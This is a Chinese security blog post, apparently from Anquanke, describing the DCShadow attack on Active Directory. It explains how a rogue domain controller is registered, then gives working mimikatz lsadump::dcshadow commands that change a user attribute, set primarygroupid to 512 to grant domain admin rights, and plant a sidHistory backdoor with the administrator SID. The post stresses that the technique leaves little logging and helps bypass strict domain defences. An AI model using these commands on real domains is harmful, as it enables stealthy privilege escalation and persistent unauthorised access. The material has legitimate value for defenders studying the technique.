域渗透:DCShadow攻击与利用

阅读量    58661 |   稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

一、原理

我们知道可以利用Mimikatz远程从DC中复制数据,即Dcsync; 类似的dcshadow可以伪装成DC,让正常DC通过伪造的DC中复制数据。

步骤
1、通过dcshadow更改配置架构和注册SPN值,将我们的服务器注册为Active Directory中的DC
2、在我们伪造的DC上更改数据,并利用域复制将数据同步到正常DC上。
相关API:DSBind、DSR*等
https://msdn.microsoft.com/en-us/library/ms675931(v=vs.85).aspx

从原理中我们可以认识到两点:
1、需要具备域管权限或域控本地管理权限,注册spn值,写权限等
2、除了dc之间的连接通信,默认情况下不会记录事件日志

 

二、利用条件

测试环境:dc机器2008r2 x64、伪装机器:win7 x64
准备条件:(两个窗口)
1、win7 system权限 (1号窗口),可以利用psexec -s cmd调system会话,也可以用mimikatz运行驱动模式,确保所有线程都运行在system上

2、win7 域管权限 (2号窗口)
在win7 中利用psexec 调用cmd即可:

三、利用方式

1、更改属性描述值
1号窗口执行数据更改与监听(后同):
lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:description /value:”anquanke-test2018!!”

2号窗口执行域复制(后同):
lsadump::dcshadow /push

在dc2008上查看结果:

2、添加域管
lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:primarygroupid/value:512

执行域复制后成功添加域管:

3、添加sidhistory 后门
查看域管administrator sid:

lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:sidhistory /value:S-1-5-21-1900941692-2128706383-2830697502-500

使用dc用户建立net use 链接后可成功访问域控:

四、总结

Dcshadow 的利用我们可以做很多事情,包括ldap用户的修改,添加后门(sidhistory后门, AdminSDHolder后门,acl后门等等),在碰到域防护较为严格的时候,往往能起到很好的bypass的效果。

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多